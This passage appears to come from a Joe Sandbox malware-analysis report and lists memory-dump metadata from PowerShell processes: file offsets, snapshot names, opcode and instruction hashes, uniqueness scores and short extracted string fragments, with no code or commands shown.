                                                          • Instruction ID: 124ad2212d55922a92e24858ad681f39cfad458406c8461173d99533a3475375
                                                          • Opcode Fuzzy Hash: b0e3bfcda09ce8def92557f5d79b3c3eed4a9b3b3799ec85161bd10b03466995
                                                          • Instruction Fuzzy Hash: 7352D6B1B002059FCF169F68C851A6ABBE2FF85310F15C46AE9059B3D1DB31DD46CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hiq$$eq$$eq
                                                          • API String ID: 0-2852621797
                                                          • Opcode ID: ccb6c374e3044ea828f03afa0da87ae403ab7e1fb393f1bc12cb683be56eaf4d
                                                          • Instruction ID: 7aad0b509b1b0620a74269c9f642318abbeee7c9ff2fe2b5de627d9873268ffb
                                                          • Opcode Fuzzy Hash: ccb6c374e3044ea828f03afa0da87ae403ab7e1fb393f1bc12cb683be56eaf4d
                                                          • Instruction Fuzzy Hash: 75224E34B012148FCB25EB25C8547AEBBB2BF89704F1584E9D40AAB391DF359E85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$tPeq
                                                          • API String ID: 0-1948393664
                                                          • Opcode ID: 9dd244212a79e1d6d4f3fc3fbbbbb0779850198a1a43b7e749b71ba2d2642991
                                                          • Instruction ID: 138ea8b4d6a6aad076580e169f20d398d8dc5cf4e0e4f18e257ab07e74dbe3c3
                                                          • Opcode Fuzzy Hash: 9dd244212a79e1d6d4f3fc3fbbbbb0779850198a1a43b7e749b71ba2d2642991
                                                          • Instruction Fuzzy Hash: A0518FB1A00205DFCF268F58C444A6ABBF2BF49310F59C4A5E8559B2D1D731ED4ACBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b697f2ef38ead5215e17f26f2ed179e472d699042031d1d45072ad8034b55900
                                                          • Instruction ID: 9f0dfa147d00b6f99d024a1b03987207161fd20b1a692cc46d50fd69069dc11b
                                                          • Opcode Fuzzy Hash: b697f2ef38ead5215e17f26f2ed179e472d699042031d1d45072ad8034b55900
                                                          • Instruction Fuzzy Hash: 55527B74A05259DFCB15DFA8D484A9DBBB2FF89314F24C199E805AB362C731ED81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: beb9f31373731455fc0f231eecd594e4c9c942bd5b50ab01323ad2c24e2b2f21
                                                          • Instruction ID: efca4a26d05ff412e438b93ececc67ef8490d53da27312138e8eebb7cc3a18b7
                                                          • Opcode Fuzzy Hash: beb9f31373731455fc0f231eecd594e4c9c942bd5b50ab01323ad2c24e2b2f21
                                                          • Instruction Fuzzy Hash: 6F324974A002189FCB15DFA9D484AADBBF2FF89314F24C4A9E405AB362D735ED41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b805d6654b2878400497acb69f45151cca5cc9977f8d41da469d085fafdc71f6
                                                          • Instruction ID: d0ef7184843fba7085852d62e9b0a49bef29fa722ed0b8faa5fcbf277d5dd4f0
                                                          • Opcode Fuzzy Hash: b805d6654b2878400497acb69f45151cca5cc9977f8d41da469d085fafdc71f6
                                                          • Instruction Fuzzy Hash: B6122A74A002499FCB15DF99C484AAEFBB2FF88714F24D199E845AB365C731ED81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f7a89cf67d038ac0652864ea5b85ff51e17500f05af867d93d65accd687ca21
                                                          • Instruction ID: 3d1b6741ca9fd1e5058e1f40816a939bbfdac1eb72feebbcdda1c7ff33ef4d11
                                                          • Opcode Fuzzy Hash: 3f7a89cf67d038ac0652864ea5b85ff51e17500f05af867d93d65accd687ca21
                                                          • Instruction Fuzzy Hash: 4FB15EB1E002098FDB14EFA9C98579DBBF1BF88318F14C12AD814E7254EB359A45CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88dad549da795e63d317d6bf690f7f5f9b2d10f0aa831bb13d47dcdd9e5b8a48
                                                          • Instruction ID: f71e63f1553892e89c3420000f5f7e1c5d8526d1c2e60f409a51120724dff4c5
                                                          • Opcode Fuzzy Hash: 88dad549da795e63d317d6bf690f7f5f9b2d10f0aa831bb13d47dcdd9e5b8a48
                                                          • Instruction Fuzzy Hash: 45A16CB0E002098FDB10DFB8D98579DBBF1AF88718F14C529E81AE7294EB749945CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6304333486617fa5d45cd6c5cbf51f02549e8fd14515a60c49ea44f6e250b51
                                                          • Instruction ID: ab869ec445582c11d0f33c6094fe84a9ac7db8797a6da6cc9526f8ded5cb7967
                                                          • Opcode Fuzzy Hash: b6304333486617fa5d45cd6c5cbf51f02549e8fd14515a60c49ea44f6e250b51
                                                          • Instruction Fuzzy Hash: 1F519C74A00545DFCB05CF99C494AAEFBB1FF88314B24929AD515AB3A0C732ED91CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b763a6c9c52b9fdf3fc76adf880a90368c04a23a0f366f2c38b05e5e82fd2450
                                                          • Instruction ID: 3a0458bb1a9b5b579db31d263e309f53b49fc101be7ff754fe0ee474db82abef
                                                          • Opcode Fuzzy Hash: b763a6c9c52b9fdf3fc76adf880a90368c04a23a0f366f2c38b05e5e82fd2450
                                                          • Instruction Fuzzy Hash: E341F59690E7E11FE703A738A8701D67F70EF57228F4A40D7C5D88B1A7D628590DC3AA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bcb61d96fe0e3797258f95020991c5fb9f57b541343bade3b5b2257418c2b59b
                                                          • Instruction ID: 7b47b3a63f0f73ea6fb0b22f2daae719cbd93a0e4bc436eba6ba763fa2e0b5e1
                                                          • Opcode Fuzzy Hash: bcb61d96fe0e3797258f95020991c5fb9f57b541343bade3b5b2257418c2b59b
                                                          • Instruction Fuzzy Hash: 5951E674A00209EFDB15DFA8D584A9DBBB2FF88314F28C559E405AB365C771ED82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a18de381eb367fb44384be1b0be58b165923340b672fedfbae913fed4656ddf0
                                                          • Instruction ID: 413ffdaf14b99b67dbded1c5bfa534e3917d7488eda99239d670caa72963edd1
                                                          • Opcode Fuzzy Hash: a18de381eb367fb44384be1b0be58b165923340b672fedfbae913fed4656ddf0
                                                          • Instruction Fuzzy Hash: 48510574A00208EFCB05DB98D584AADFBF2FF88314F65C159E405AB365CB75AD82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abf8f566076be691e38b9c3dde5a31fc79539d80b1df39d77aeef08eced14d23
                                                          • Instruction ID: 63773e45fa14d7e7748191e30461033bd5ab1290eace870dcd2475b5af25290f
                                                          • Opcode Fuzzy Hash: abf8f566076be691e38b9c3dde5a31fc79539d80b1df39d77aeef08eced14d23
                                                          • Instruction Fuzzy Hash: AB41F774A00208EFDB05DF98D584A9DFBB2FF88314F24D199E805AB365C771AD82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b826e750f5e2aa3feba64f3da3ac86bf868aca46518019c7802ff8fc49bbc645
                                                          • Instruction ID: ced73bb64350a10f48e1119156b625231562547c17f2af44f868bbd7d0243dcd
                                                          • Opcode Fuzzy Hash: b826e750f5e2aa3feba64f3da3ac86bf868aca46518019c7802ff8fc49bbc645
                                                          • Instruction Fuzzy Hash: 13313674A006499FCB00DF8DD8809AEBBB5FF89314B6485A5E809EB356C731ED51CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8827df8a1ba7169ab8cbd2565eb14bb4b718c490b2ef75d7f48379ef56a1076a
                                                          • Instruction ID: 5a2a51f8522f6ec4aa1c8550477b2efff3562e157f786d614eecb5e0d97ad1bb
                                                          • Opcode Fuzzy Hash: 8827df8a1ba7169ab8cbd2565eb14bb4b718c490b2ef75d7f48379ef56a1076a
                                                          • Instruction Fuzzy Hash: FA31FC30A011188FCB25EB64C8546EEB7B2BF89308F1584E9D50AAB351DB359E85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1e22f180ce486420028b3366c63aa20d951f848fe5f5210cbacf775a6facd77
                                                          • Instruction ID: e98b6d4c66a8575c3f56d9ecadc513293fb01153c97c59f6a1d651c35b253e51
                                                          • Opcode Fuzzy Hash: b1e22f180ce486420028b3366c63aa20d951f848fe5f5210cbacf775a6facd77
                                                          • Instruction Fuzzy Hash: C0211674A00509DFCB04DF89C8849AEFBB1FF88314B248599E809AB751C731ED51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b268af126bba6d28a266faf8a6fbf1da579c4d6bf82a5803e5654a04a41e48e8
                                                          • Instruction ID: b48e9708134157a2c8eafbc6115013896282e153efc8ac34b1b087b413b31989
                                                          • Opcode Fuzzy Hash: b268af126bba6d28a266faf8a6fbf1da579c4d6bf82a5803e5654a04a41e48e8
                                                          • Instruction Fuzzy Hash: A821D5B8A0051A9FCB54DF89C580AAAF7B5FB4C314B148559E909E7351C731ED91CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f07631198392588ef6e8cb61b19acbc38ec8929043907be9377e77caa62001a4
                                                          • Instruction ID: 1ec766a67a238990cf0e593f5582da15f54a581d3a6c44c3efcc338204fa8e24
                                                          • Opcode Fuzzy Hash: f07631198392588ef6e8cb61b19acbc38ec8929043907be9377e77caa62001a4
                                                          • Instruction Fuzzy Hash: 7211D774A01209EFDB15DFA8D484A9DBBB2FF88314F28C559E405AB365C771A982DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b10b8946587d00dc03841265b4f8f840e148beafd73b982d0c33c3a5b46e5b26
                                                          • Instruction ID: 3b2c4d5dc894ad1d05e32f9d5958c7e194301acc0e0882525709e752bb220aea
                                                          • Opcode Fuzzy Hash: b10b8946587d00dc03841265b4f8f840e148beafd73b982d0c33c3a5b46e5b26
                                                          • Instruction Fuzzy Hash: B411FB74A04209EFDB45DF98D484A9DBBF1FF48314F69C154E405AB361CB71AD82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2766820687.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2b6d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2766820687.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2b6d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-1010287211
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$845l$845l$tPeq$tPeq$$eq$(kq$(kq$(kq
                                                          • API String ID: 0-3297072039
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$845l$845l$tPeq$tPeq$tPeq$tPeq
                                                          • API String ID: 0-2071899847
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-723692213
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$845l$TQjq$TQjq$tPeq$$eq$$eq$$eq
                                                          • API String ID: 0-3310313400
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$4'eq$4'eq$x.(k$-(k
                                                          • API String ID: 0-22441994
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$XRjq$XRjq$tPeq$$eq
                                                          • API String ID: 0-17508257
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $eq$$eq$$eq$-l$-l
                                                          • API String ID: 0-3258709071
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (oeq$(oeq$(oeq$(oeq
                                                          • API String ID: 0-182854655
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$x.(k$-(k
                                                          • API String ID: 0-2938298036
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$tPeq$tPeq
                                                          • API String ID: 0-1655194071
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$tPeq$tPeq
                                                          • API String ID: 0-1655194071
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$tPeq$tPeq
                                                          • API String ID: 0-1655194071
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $eq$$eq$$eq$$eq
                                                          • API String ID: 0-812946093
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$$eq$$eq
                                                          • API String ID: 0-3287427201
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3309211656.00000000030ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 030ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_30ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3309211656.00000000030ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 030ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_30ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%